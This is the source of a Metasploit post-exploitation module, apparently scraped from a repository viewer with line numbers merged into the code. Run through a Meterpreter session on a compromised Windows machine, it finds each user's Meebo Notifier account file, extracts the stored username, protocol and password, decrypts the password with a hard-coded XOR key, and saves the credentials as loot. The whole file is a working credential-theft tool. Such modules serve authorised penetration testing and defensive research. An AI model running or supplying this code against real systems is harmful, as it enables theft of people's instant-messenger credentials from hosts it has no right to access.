Path: blob/master/modules/post/windows/gather/credentials/meebo.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Auxiliary::Report7include Msf::Post::Windows::UserProfiles89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Windows Gather Meebo Password Extractor',14'Description' => %q{15This module extracts login account password stored by16Meebo Notifier, a desktop version of Meebo's Online Messenger.17},18'License' => MSF_LICENSE,19'Author' => [20'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>',21'Unknown', # SecurityXploded Team, www.SecurityXploded.com22],23'Platform' => [ 'win' ],24'SessionTypes' => [ 'meterpreter' ],25'Compat' => {26'Meterpreter' => {27'Commands' => %w[28core_channel_eof29core_channel_open30core_channel_read31core_channel_write32stdapi_fs_stat33]34}35},36'Notes' => {37'Stability' => [CRASH_SAFE],38'SideEffects' => [],39'Reliability' => []40}41)42)43end4445def run46grab_user_profiles.each do |user|47next if user['AppData'].nil?4849accounts = user['AppData'] + '\\Meebo\\MeeboAccounts.txt'5051next if accounts.empty?5253stat = begin54session.fs.file.stat(accounts)55rescue StandardError56nil57end58next if stat.nil?5960parse_txt(accounts)61end62end6364def parse_txt(file)65creds = Rex::Text::Table.new(66'Header' => 'Meebo Instant Messenger Credentials',67'Indent' => 1,68'Columns' =>69[70'User',71'Password',72'Protocol'73]74)7576config = client.fs.file.new(file, 'r')77parse = config.read7879if (parse =~ /"password.{5}(.*)",\s*"protocol.{4}(\d),\s*"username.{5}(.*)"/)80epass = ::Regexp.last_match(1)81protocol = ::Regexp.last_match(2).to_i82username = ::Regexp.last_match(3)83else84print_error('Could not extract credentials from file')85return86end8788case protocol89when 090protocol = 'Meebo'91when 192protocol = 'AIM'93when 294protocol = 'Yahoo IM'95when 396protocol = 'Windows Live'97when 498protocol = 'Google Talk'99when 5100protocol = 'ICQ'101when 6102protocol = 'Jabber'103when 7104protocol = 'Myspace IM'105end106107passwd = decrypt(epass)108print_good("*** Protocol: #{protocol} User: #{username} Password: #{passwd} ***")109creds << [username, passwd, protocol]110config.close111112if passwd.nil? || username.nil?113print_status('Meebo credentials have not been found')114return115end116117print_status('Storing data...')118path = store_loot(119'meebo.user.creds',120'text/csv',121session,122creds.to_csv,123'meebo_user_creds.csv',124'Meebo Notifier User Credentials'125)126127print_good("Meebo Notifier user credentials saved in: #{path}")128rescue StandardError => e129print_error("An error has occurred: #{e}")130end131132def decrypt(epass)133magicarr = [1344, 240, 122, 53, 65, 19, 163, 124, 109,13573, 187, 3, 34, 93, 15, 138, 11, 153, 148, 147, 146,136222, 129, 160, 199, 104, 240, 43, 89, 105, 204, 236,137253, 168, 96, 48, 158, 143, 173, 60, 215, 104, 112,138149, 15, 114, 107, 4, 92, 149, 48, 177, 42, 133, 124,139152, 63, 137, 2, 40, 84, 131140]141142plaintext = [epass].pack('H*').unpack('C*')143144for i in 0..plaintext.length - 1 do145plaintext[i] ^= magicarr[i]146end147148return plaintext.pack('C*')149end150end151152153